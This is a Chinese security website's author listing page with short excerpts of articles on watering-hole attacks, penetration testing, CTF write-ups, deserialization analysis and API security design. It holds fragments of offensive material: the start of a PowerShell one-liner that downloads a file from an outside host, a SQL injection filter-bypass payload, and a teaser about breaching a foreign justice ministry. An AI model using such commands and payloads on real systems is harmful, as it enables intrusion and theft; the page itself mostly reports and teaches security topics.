admin 发表的所有文章 | CN-SEC 中文网

安全新闻

新式水坑攻击——利用浏览器错误，悄悄安装后门！

网络安全研究人员披露了关于水坑攻击的细节，该攻击利用谷歌浏览器和IE浏览器的漏洞，部署恶意软件进行间谍活动。这一攻击使用了SLUB(即SLack和githUB)恶意软件和两个新的后门——dneSpy和...

11月18日140 views评论

阅读全文

通过旁注渗透拿下F国司法部

首先看了一下网站，没看出是什么程序写的，也没发现值得深入下手的地方。于是便旁注了，很快，拿到了一个旁站的shell。这才发现，服务器支持asp,aspx,php，但是限制很多。简单试了下没提权成功。反...

11月18日安全文章97 views评论

阅读全文

安全文章

一些内网渗透所用Poweshell脚本(一)

利用powershell下载一个文件：powershell (new-object System.Net.WebClient).DownloadFile('http://down.3...

11月18日162 views评论

阅读全文

1233211234567

分享几个tips，不记得哪里找的了。注入过滤逗号127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (S...

11月18日安全闲碎80 views评论

阅读全文

安全新闻

我不是盘神！PanDownload 作者被抓捕，一代神器凉凉了！

太心痛了！昨天，2020年4月15日消息：今年2月，受害人刘某报案称其下载的“Pandownload”软件会在未授权的情况下，将自己百度网盘的数据共享出去，导致隐私照片和文件泄露。宝应县局网安民警立即...

11月18日181 views评论

阅读全文

安全文章

一次团队内部比赛经历

经过这次登录框被多数人打爆的经历，我反思了很多。由于当时为了快点写好登录框，没有考虑对登录框的SQL注入进行预防。在写登录框制作总结时，也发现了自己登录框存在的漏洞，但是没有去改。。。最终导致这一惨剧...

11月18日74 views已关闭评论

阅读全文

代码审计

【创宇小课堂】代码审计-ysoserial-C3P0分析

介绍C3P0是一个开源的JDBC连接池，它实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate、Spring等。基础使用先看看ysoseria...

11月18日86 views评论

阅读全文

CTF专场

强网拟态线上wp

听歌抖音关注：是二智呀WEBzerocalc根据提示读文件ezPickle先看config.pynotadmin={"admin":"no"}def backdoor(cmd):if&nbs...

11月18日312 views评论

阅读全文

安全文章

加密API研究

CryptoAPI 概述 Windows CryptoAPI是Microsoft 公司提出的安全加密应用服务框架，也是PKI推荐使用的加密 API。它提供了在W...

11月18日95 views已关闭评论

阅读全文

安全文章

JWT-token—前后端分离架构的api安全问题

前后端分离架构带来的好处一搜一大堆，我们来看一下分离后后端接口的安全问题。前后端分离架构现状：前端：vue项目，Nginx部署后端：node.js和java项目这样的情况后端api是暴露在外网...

11月18日441 views已关闭评论

阅读全文

安全文章

如何建立有效的API安全策略（完结篇）

8、边缘到端点的安全对于微服务架构，需要考虑“边缘到端点”的安全策略，具体如下图6所示：如图6所示，外部API网关执行身份认证以及其他功能，例如内容检查，然后使用诸如JSON web令牌之类的标准...

11月18日125 views已关闭评论

阅读全文

安全|API接口安全性设计（防篡改和重复调用）

API接口的安全性主要是为了保证数据不会被篡改和重复调用，实现方案主要围绕Token、时间戳和Sign三个机制展开设计。1. Token授权机制用户使用用户名密码登录后服务器给客户端返回一个Toke...

11月18日安全文章150 views已关闭评论

阅读全文

admin

新式水坑攻击——利用浏览器错误，悄悄安装后门！

通过旁注渗透拿下F国司法部

一些内网渗透所用Poweshell脚本(一)

1233211234567

我不是盘神！PanDownload 作者被抓捕，一代神器凉凉了！

一次团队内部比赛经历

【创宇小课堂】代码审计-ysoserial-C3P0分析

强网拟态线上wp

加密API研究

如何建立有效的API安全策略（完结篇）

安全|API接口安全性设计（防篡改和重复调用）

在线咨询

微信